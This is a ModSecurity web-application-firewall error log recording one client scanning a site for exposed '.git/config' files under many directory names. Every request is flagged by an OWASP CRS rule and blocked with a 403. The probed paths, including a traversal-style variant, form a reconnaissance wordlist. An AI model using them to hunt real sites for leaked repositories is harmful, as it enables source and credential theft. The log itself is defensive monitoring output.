[Sat Jul 29 05:51:01.269960 2023] [:error] [pid 1029094] [client 18.222.143.90:45094] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /demo/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/demo/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAAAAAAc"]
[Sat Jul 29 05:51:01.270259 2023] [:error] [pid 1029094] [client 18.222.143.90:45094] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/demo/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAAAAAAc"]
[Sat Jul 29 05:51:01.270433 2023] [:error] [pid 1029094] [client 18.222.143.90:45094] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/demo/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAAAAAAc"]
[Sat Jul 29 05:51:01.271968 2023] [:error] [pid 1026837] [client 18.222.143.90:45274] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5epwAAAAU"]
[Sat Jul 29 05:51:01.273379 2023] [:error] [pid 1028943] [client 18.222.143.90:45130] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QQAAAAY"]
[Sat Jul 29 05:51:01.273632 2023] [:error] [pid 1026830] [client 18.222.143.90:45232] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /live/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/live/.git/config"] [unique_id "ZMSMpa0f8dGtNkSGjNsx1gAAAAE"]
[Sat Jul 29 05:51:01.273656 2023] [:error] [pid 1028943] [client 18.222.143.90:45130] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QQAAAAY"]
[Sat Jul 29 05:51:01.273835 2023] [:error] [pid 1028943] [client 18.222.143.90:45130] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QQAAAAY"]
[Sat Jul 29 05:51:01.273939 2023] [:error] [pid 1026830] [client 18.222.143.90:45232] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/live/.git/config"] [unique_id "ZMSMpa0f8dGtNkSGjNsx1gAAAAE"]
[Sat Jul 29 05:51:01.274109 2023] [:error] [pid 1026830] [client 18.222.143.90:45232] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/live/.git/config"] [unique_id "ZMSMpa0f8dGtNkSGjNsx1gAAAAE"]
[Sat Jul 29 05:51:01.274494 2023] [:error] [pid 1026837] [client 18.222.143.90:45274] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5epwAAAAU"]
[Sat Jul 29 05:51:01.274673 2023] [:error] [pid 1026837] [client 18.222.143.90:45274] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5epwAAAAU"]
[Sat Jul 29 05:51:01.276429 2023] [:error] [pid 1029471] [client 18.222.143.90:45372] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz6AAAAAg"]
[Sat Jul 29 05:51:01.276709 2023] [:error] [pid 1029471] [client 18.222.143.90:45372] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz6AAAAAg"]
[Sat Jul 29 05:51:01.276867 2023] [:error] [pid 1029471] [client 18.222.143.90:45372] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz6AAAAAg"]
[Sat Jul 29 05:51:01.278033 2023] [:error] [pid 1026833] [client 18.222.143.90:45218] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72OwAAAAQ"]
[Sat Jul 29 05:51:01.278298 2023] [:error] [pid 1026833] [client 18.222.143.90:45218] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72OwAAAAQ"]
[Sat Jul 29 05:51:01.278459 2023] [:error] [pid 1026833] [client 18.222.143.90:45218] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72OwAAAAQ"]
[Sat Jul 29 05:51:01.285058 2023] [:error] [pid 1026829] [client 18.222.143.90:45264] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cms/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cms/.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNqAAAAAA"]
[Sat Jul 29 05:51:01.285372 2023] [:error] [pid 1026829] [client 18.222.143.90:45264] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cms/.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNqAAAAAA"]
[Sat Jul 29 05:51:01.285579 2023] [:error] [pid 1026829] [client 18.222.143.90:45264] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cms/.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNqAAAAAA"]
[Sat Jul 29 05:51:01.385014 2023] [:error] [pid 1026832] [client 18.222.143.90:44940] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/images../.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCFAAAAAM"]
[Sat Jul 29 05:51:01.385261 2023] [:error] [pid 1026832] [client 18.222.143.90:44940] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/images../.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCFAAAAAM"]
[Sat Jul 29 05:51:01.385414 2023] [:error] [pid 1026832] [client 18.222.143.90:44940] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/images../.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCFAAAAAM"]
[Sat Jul 29 05:51:01.457169 2023] [:error] [pid 1026831] [client 18.222.143.90:45030] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYQAAAAI"]
[Sat Jul 29 05:51:01.457448 2023] [:error] [pid 1026831] [client 18.222.143.90:45030] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYQAAAAI"]
[Sat Jul 29 05:51:01.457613 2023] [:error] [pid 1026831] [client 18.222.143.90:45030] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYQAAAAI"]
[Sat Jul 29 05:51:01.459473 2023] [:error] [pid 1029472] [client 18.222.143.90:44962] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/blog/.git/config"] [unique_id "ZMSMpX17sYnopBCfenbq1gAAAAk"]
[Sat Jul 29 05:51:01.459737 2023] [:error] [pid 1029472] [client 18.222.143.90:44962] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/blog/.git/config"] [unique_id "ZMSMpX17sYnopBCfenbq1gAAAAk"]
[Sat Jul 29 05:51:01.459893 2023] [:error] [pid 1029472] [client 18.222.143.90:44962] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/blog/.git/config"] [unique_id "ZMSMpX17sYnopBCfenbq1gAAAAk"]
[Sat Jul 29 05:51:01.462612 2023] [:error] [pid 1029473] [client 18.222.143.90:45044] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /qa/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/qa/.git/config"] [unique_id "ZMSMpe_C8YnenBeejlHC6QAAAAo"]
[Sat Jul 29 05:51:01.462874 2023] [:error] [pid 1029473] [client 18.222.143.90:45044] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/qa/.git/config"] [unique_id "ZMSMpe_C8YnenBeejlHC6QAAAAo"]
[Sat Jul 29 05:51:01.463028 2023] [:error] [pid 1029473] [client 18.222.143.90:45044] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/qa/.git/config"] [unique_id "ZMSMpe_C8YnenBeejlHC6QAAAAo"]
[Sat Jul 29 05:51:01.507832 2023] [:error] [pid 1029094] [client 18.222.143.90:45164] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repos/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/repos/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAQAAAAc"]
[Sat Jul 29 05:51:01.508087 2023] [:error] [pid 1029094] [client 18.222.143.90:45164] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/repos/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAQAAAAc"]
[Sat Jul 29 05:51:01.508237 2023] [:error] [pid 1029094] [client 18.222.143.90:45164] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/repos/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAQAAAAc"]
[Sat Jul 29 05:51:01.512326 2023] [:error] [pid 1029471] [client 18.222.143.90:45278] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /site/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz6QAAAAg"]
[Sat Jul 29 05:51:01.512454 2023] [:error] [pid 1026837] [client 18.222.143.90:45062] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /m/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/m/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5eqAAAAAU"]
[Sat Jul 29 05:51:01.512552 2023] [:error] [pid 1029471] [client 18.222.143.90:45278] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz6QAAAAg"]
[Sat Jul 29 05:51:01.512666 2023] [:error] [pid 1026837] [client 18.222.143.90:45062] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/m/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5eqAAAAAU"]
